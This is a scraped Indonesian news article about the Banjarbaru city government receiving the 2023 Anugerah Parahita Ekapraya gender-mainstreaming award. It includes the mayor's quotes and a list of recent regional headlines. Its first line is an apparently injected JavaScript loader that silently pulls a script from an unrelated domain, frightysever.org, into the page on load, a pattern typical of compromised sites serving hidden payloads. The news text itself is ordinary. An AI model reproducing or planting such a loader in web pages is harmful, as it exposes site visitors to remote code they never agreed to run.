(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Pemko Banjarbaru Raih Penghargaan APE 2023 Predikat Pratama


KANALKALIMANTAN.COM, BANJARBARU – Pemerintah Kota Banjarbaru meraih penghargaan Anugerah Parahita Ekapraya (APE) tahun 2023 dari Kementerian Pemberdayaan Perempuan dan Perlindungan Anak (PPPA) Republik Indonesia.

Penghargaan tersebut merupakan bentuk pengakuan atas komitmen dan peran para pimpinan kementerian lembaga dan pemerintah daerah mewujudkan kesetaraan gender dan pemberdayaan perempuan dalam bidang pembangunan.

Penerima penghargaan itu diumumkan saat acara penganugerahan APE 2023 yang diselenggarakan secara virtual di Command Center Balai Kota Banjarbaru, Selasa (19/12/2023). Pemko Banjarbaru di era Wali Kota Aditya Mufti Ariffin ini diberi penghargaan APE dengan predikat pratama.

Baca juga: Libur Sekolah, Naufal dan Adik-adiknya Bermain ke Kantor Kanalkalimantan

“Alhamdulillah, kemarin sudah diumumkan bahwa Pemko Banjarbaru menerima penghargaan APE predikat pratama. Ini bentuk keberhasilan dalam pencapaian pembangunan pengarusutamaan gender, pemberdayaan perempuan, dan perlindungan anak di Banjarbaru,” ucap Wali Kota Aditya.

Berdasarkan hasil yang diumumkan Kementerian PPPA, penghargaan APE predikat pratama hanya diraih 4 kabupaten kota di Provinsi Kalimantan Selatan. Pemko Banjarbaru, bersama tiga pemerintah daerah lainnya yakni Pemkab Tabalong, Pemkab Balangan, dan Pemkab Banjar.

Adapun Anugerah Parahita Ekapraya ini didasarkan atas hasil evaluasi pengarusutamaan gender (PUG) tahun 2023 melalui evaluasi mandiri. Kemudian dilakukan verifikasi administrasi dan verifikasi lapangan untuk selanjutnya dilakukan verifikasi akhir.

Baca juga: Bunda Literasi HSU Ajak Generasi Milenial Perbanyak Baca Buku

Menurut Wali Kota Aditya, dibutuhkan perencanaan dan penganggaran yang matang dalam mengimplementasikan pelaksanaan pengarusutamaan gender. Termasuk pula keterlibatan dari seluruh pihak untuk saling mendukung, dimana Dinas PPKBPMPPA (Pengendalian Penduduk Keluarga Berencana Pemberdayaan Masyarakat Perlindungan Perempuan dan Anak) Kota Banjarbaru menjadi ujung tombak pelaksanaan PUG.

“Jadi kolaborasi dengan pihak swasta maupun masyarakat harus dilakukan. Sehingga diharapkan implementasi PUG di Banjarbaru bisa dilakukan bahkan pada level yang paling kecil. Insya Allah, 2024 kita maksimalkan lagi,” tuturnya.

Baca juga: Jelang Libur Nataru, DPKP Banjar Monitoring Dua Tempat Wisata

Atas diraihnya penghargaan APE 2023 ini turut menjadi bukti bahwa Kota Banjarbaru telah berjalan di atas nilai-nilai kesetaraan gender laki-laki dan perempuan. Efek dari hal ini juga mempengaruhi percepatan penurunan angka kemiskinan, meningkatkan taraf hidup dan ekonomi masyarakat. (Kanalkalimantan.com/bie)

Reporter : bie
Editor : kk


Muhammad Andi

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

12 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

13 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

16 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

17 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

19 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

20 jam ago

This website uses cookies.